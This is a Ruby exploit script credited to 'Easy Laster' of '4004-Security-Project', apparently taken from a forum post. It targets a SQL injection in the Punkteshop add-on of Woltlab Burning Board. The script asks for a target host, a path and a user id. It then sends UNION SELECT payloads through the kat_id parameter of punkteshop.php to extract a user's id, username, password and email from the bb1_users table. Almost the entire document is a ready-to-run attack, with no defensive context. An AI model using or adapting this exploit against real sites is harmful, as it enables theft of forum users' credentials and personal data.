[php]
#!/usr/bin/ruby
#Discovered and vulnerability by Easy Laster
print "
############################################################
# 4004-Security-Project #
############################################################
# Woltlab Burning Board Punkteshop Hack SQL Injection #
# Exploit #
# Using Host+Path+id #
# www.demo.de /wbb/ 1 #
# Easy Laster #
############################################################
"
require ’net/http‘
block = "#########################################################"
print ""+ block +""
print "\nEnter host name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter script path (/wbb/)->"
path=gets.chomp
print ""+ block +""
print "\nEnter the id (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,userid,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUserid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,password,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUPassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "punkteshop.php?kat_id=’+UNION+SELECT+1,2,3,4,concat(0x23,0"+
"x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),6,7,"+
"8,9,10,11,12,13,14,15+from+bb1_users+where+userid="+userid+"–+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed or hackblock"
end
Mit Zitat antworten
[/php]